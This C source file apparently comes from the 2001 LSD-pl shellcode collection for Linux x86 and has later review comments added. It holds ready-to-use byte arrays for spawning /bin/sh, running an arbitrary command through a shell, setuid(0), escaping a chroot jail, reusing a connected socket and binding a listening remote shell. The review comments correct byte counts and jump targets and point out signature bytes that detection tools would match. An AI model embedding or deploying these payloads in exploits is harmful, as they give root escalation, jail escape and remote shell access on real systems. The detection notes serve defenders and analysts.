/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for linux (redhat 6.2) x86                                     #*/

/*
syscall     %eax %ebx,%ecx,%edx
----------- ---- ---------------------------------------------------------------
exec        x00b ->path="/bin//sh",->[->a0=path,0]
exec        x00b ->path="/bin//sh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      x017 uid=0
mkdir       x027 ->path="b..",mode=0 (each value is valid)
chroot      x03d ->path={"b..","."}
chdir       x00c ->path=".."
socketcall  x066 getpeername=7,->[sfd,->sadr=[],->[len=0x10]]
socketcall  x066 socket=1,->[AF_INET=2,SOCK_STREAM=2,prot=0]
socketcall  x066 bind=2,->[sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],len=0x10]
socketcall  x066 listen=4,->[sfd,backlog=102]
socketcall  x066 accept=5,->[sfd,0,0]
dup2        x03f sfd,fd={2,1,0}
*/

#if defined(X86) && defined(LINUX)

/* execve("/bin//sh", ["/bin//sh", NULL], NULL).  The path is assembled on
 * the stack from two dword pushes ("/bin", "//sh" -- the doubled slash pads
 * it to 8 bytes) behind a pushed NUL dword; %ecx becomes argv and cdq
 * copies the zero in %eax into %edx so envp is NULL.  Detection note: the
 * literal "/bin//sh" followed a few bytes later by "\xb0\x0b\xcd\x80" is
 * the byte pattern a signature or memory scan would match on.            */
char shellcode[]=          /* 24 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax  (string NUL / envp) */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx  (path)      */
    "\x50"                 /* pushl   %eax  (argv terminator) */
    "\x53"                 /* pushl   %ebx  (argv[0]=path)   */
    "\x89\xe1"             /* movl    %esp,%ecx  (argv)      */
    "\x99"                 /* cdql    (%edx=0, envp=NULL)    */
    "\xb0\x0b"             /* movb    $0x0b,%al  (execve)    */
    "\xcd\x80"             /* int     $0x80                  */
;

/* execve("/bin//sh", ["/bin//sh", "-c", cmd, NULL], NULL) where cmd is
 * whatever follows the trailing call.  The jmp/call pair is the usual
 * position-independent trick: the call pushes the address of the byte
 * after it, and the popl at +2 takes that as the pointer to cmd (argv[2]).
 * "-c" is placed by a 2-byte pushw on top of a zero dword, so it is
 * NUL-terminated.  NOTE(review): summing the escapes gives 41 code bytes,
 * not the 40 the original comment stated; the cmd text is on top of that. */
char cmdshellcode[]=       /* 41+cmdlen bytes                */
    "\xeb\x22"             /* jmp     <cmdshellcode+36>      */
    "\x59"                 /* popl    %ecx  (-> cmd)         */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx  (path)      */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68""-c"         /* pushw   $0x632d  ("-c\0")      */
    "\x89\xe7"             /* movl    %esp,%edi  (-> "-c")   */
    "\x50"                 /* pushl   %eax  (argv terminator) */
    "\x51"                 /* pushl   %ecx  (argv[2]=cmd)    */
    "\x57"                 /* pushl   %edi  (argv[1]="-c")   */
    "\x53"                 /* pushl   %ebx  (argv[0]=path)   */
    "\x89\xe1"             /* movl    %esp,%ecx  (argv)      */
    "\x99"                 /* cdql    (%edx=0, envp=NULL)    */
    "\xb0\x0b"             /* movb    $0x0b,%al  (execve)    */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe8\xd9\xff\xff\xff" /* call    <cmdshellcode+2>       */
    /* command (the bytes here are what the popl above points at) */
;

/* setuid(0).  Note the encoding: "\x33\xc0" and "\x31\xc0" are both
 * xorl %eax,%eax (opcode 33 vs 31 with swapped operand direction); this
 * file mixes them, so a byte-exact signature written against one form
 * misses the other.                                                      */
char setuidcode[]=         /* 8 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x31\xdb"             /* xorl    %ebx,%ebx  (uid=0)     */
    "\xb0\x17"             /* movb    $0x17,%al  (setuid)    */
    "\xcd\x80"             /* int     $0x80                  */
;

/* Syscall sequence: mkdir("b..",0); chroot("b.."); chdir("..") x255;
 * chroot(".").  One pushed dword "bb.." serves as all three path strings:
 * %ebx is bumped by incl before each use so it points at "b..", then "..",
 * then "." (the pushed zero dword above it is the terminator).  %cl=0xff
 * is the loop counter for the chdir calls; %al is reloaded inside the
 * loop because int $0x80 leaves the return value in %eax.
 * NOTE(review): the loop at +30 is "e2 fa" (rel -6 from +32), so it
 * resolves to +26 (the movb $0x0c,%al), not the +21 the original
 * comment gave.                                                          */
char chrootcode[]=         /* 37 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax  (string NUL)     */
    "\x68""bb.."           /* pushl   $0x2e2e6262            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x43"                 /* incl    %ebx  (-> "b..")       */
    "\x33\xc9"             /* xorl    %ecx,%ecx  (mode=0)    */
    "\xb0\x27"             /* movb    $0x27,%al  (mkdir)     */
    "\xcd\x80"             /* int     $0x80                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x3d"             /* movb    $0x3d,%al  (chroot)    */
    "\xcd\x80"             /* int     $0x80                  */
    "\x43"                 /* incl    %ebx  (-> "..")        */
    "\xb1\xff"             /* movb    $0xff,%cl  (255 iters) */
    "\xb0\x0c"             /* movb    $0x0c,%al  (chdir)     */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xfa"             /* loop    <chrootcode+26>        */
    "\x43"                 /* incl    %ebx  (-> ".")         */
    "\xb0\x3d"             /* movb    $0x3d,%al  (chroot)    */
    "\xcd\x80"             /* int     $0x80                  */
;

/* Scans descriptors 255 down to 1 with socketcall(getpeername) and stops
 * at the first one whose peer port (offset 2 of the sockaddr at 0x10(%edi))
 * equals the 16-bit placeholder 0x1234 (patched at FINDSCKPORTOFS), then
 * dup2()s it onto fds 2, 1, 0.  Layout built at %edi: [fd, &sadr, &len],
 * with len=0x10 stored at 0x20(%edi).  %ecx doubles as the loop counter
 * and the fd under test, so it is saved/restored around the syscall with
 * pushl/popl.  NOTE(review): if no descriptor matches, the loop falls
 * through with %ecx=0 and the dup2 sequence runs against fd 0.          */
char findsckcode[]=        /* 72 bytes                       */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\x89\xe7"             /* movl    %esp,%edi  (arg block) */
    "\x8d\x77\x10"         /* leal    0x10(%edi),%esi (sadr) */
    "\x89\x77\x04"         /* movl    %esi,0x4(%edi)         */
    "\x8d\x4f\x20"         /* leal    0x20(%edi),%ecx (len)  */
    "\x89\x4f\x08"         /* movl    %ecx,0x8(%edi)         */
    "\xb3\x10"             /* movb    $0x10,%bl              */
    "\x89\x19"             /* movl    %ebx,(%ecx)  (len=16)  */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl  (fd=255)    */
    "\x89\x0f"             /* movl    %ecx,(%edi)  (fd arg)  */
    "\x51"                 /* pushl   %ecx  (save counter)   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x66"             /* movb    $0x66,%al  (socketcall) */
    "\xb3\x07"             /* movb    $0x07,%bl  (getpeername) */
    "\x89\xf9"             /* movl    %edi,%ecx              */
    "\xcd\x80"             /* int     $0x80                  */
    "\x59"                 /* popl    %ecx  (restore counter) */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\x39\xd8"             /* cmpl    %ebx,%eax  (ret == 0?) */
    "\x75\x0a"             /* jne     <findsckcode+54>       */
    "\x66\xb8\x12\x34"     /* movw    $0x1234,%bx  (port placeholder) */
    "\x66\x39\x46\x02"     /* cmpw    %bx,0x2(%esi)  (peer port) */
    "\x74\x02"             /* je      <findsckcode+56>       */
    "\xe2\xe0"             /* loop    <findsckcode+24>       */
    "\x89\xcb"             /* movl    %ecx,%ebx  (sfd)       */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x3f"             /* movb    $0x3f,%al  (dup2)      */
    "\x49"                 /* decl    %ecx  (fd 2, 1, 0)     */
    "\xcd\x80"             /* int     $0x80                  */
    "\x41"                 /* incl    %ecx                   */
    "\xe2\xf6"             /* loop    <findsckcode+62>       */
;

/* socket(AF_INET, SOCK_STREAM, 0); bind(sfd, sadr, 0x10); listen(sfd, 102);
 * accept(sfd, NULL, NULL); dup2 the accepted fd onto 2, 1, 0.  The pushed
 * dword 0x341202ff is the start of the sockaddr; its bytes 0x12 0x34 at
 * offset BINDSCKPORTOFS are the port placeholder.  The code pushes type=1,
 * i.e. SOCK_STREAM (the header table above lists it as 2).  listen's
 * backlog is the 0x66 left in %eax and stored over the old &sadr slot;
 * accept reuses the %ecx pointer set before bind, and the two pushl %eax
 * after addl $0x0c,%esp overwrite that block's slots 1 and 2 with zeros.
 * Only 8 bytes of the 16-byte sockaddr are initialised (the other 8 are
 * whatever was already on the stack).                                    */
char bindsckcode[]=        /* 73 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax  (sadr zero pad)  */
    "\x68\xff\x02\x12\x34" /* pushl   $0x341202ff  (family, port) */
    "\x89\xe7"             /* movl    %esp,%edi  (-> sadr)   */
    "\x50"                 /* pushl   %eax  (prot=0)         */
    "\x6a\x01"             /* pushb   $0x01  (SOCK_STREAM)   */
    "\x6a\x02"             /* pushb   $0x02  (AF_INET)       */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\xb0\x66"             /* movb    $0x66,%al  (socketcall) */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\x43"                 /* incl    %ebx  (socket=1)       */
    "\xcd\x80"             /* int     $0x80                  */
    "\x6a\x10"             /* pushb   $0x10  (len)           */
    "\x57"                 /* pushl   %edi  (&sadr)          */
    "\x50"                 /* pushl   %eax  (sfd)            */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\x43"                 /* incl    %ebx  (bind=2)         */
    "\xcd\x80"             /* int     $0x80                  */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\xb3\x04"             /* movb    $0x04,%bl  (listen=4)  */
    "\x89\x44\x24\x04"     /* movl    %eax,0x4(%esp)  (backlog=0x66) */
    "\xcd\x80"             /* int     $0x80                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x83\xc4\x0c"         /* addl    $0x0c,%esp             */
    "\x50"                 /* pushl   %eax  (zero slot 2)    */
    "\x50"                 /* pushl   %eax  (zero slot 1)    */
    "\xb0\x66"             /* movb    $0x66,%al              */
    "\x43"                 /* incl    %ebx  (accept=5)       */
    "\xcd\x80"             /* int     $0x80                  */
    "\x89\xc3"             /* movl    %eax,%ebx  (accepted fd) */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x3f"             /* movb    $0x3f,%al  (dup2)      */
    "\x49"                 /* decl    %ecx  (fd 2, 1, 0)     */
    "\xcd\x80"             /* int     $0x80                  */
    "\x41"                 /* incl    %ecx                   */
    "\xe2\xf6"             /* loop    <bindsckcode+63>       */
;

/* Byte offsets of the 16-bit port placeholders inside the two arrays:
 * findsckcode's "movw $0x1234,%bx" sits at +44, so its immediate is at
 * +46; bindsckcode's "pushl $0x341202ff" sits at +3, so its 0x12 0x34
 * bytes are at +6.  Note that 06 is an octal literal (value 6) -- fine
 * here, but 08/09 would not compile; plain 6 would be clearer.          */
#define FINDSCKPORTOFS     46
#define BINDSCKPORTOFS     06

#endif
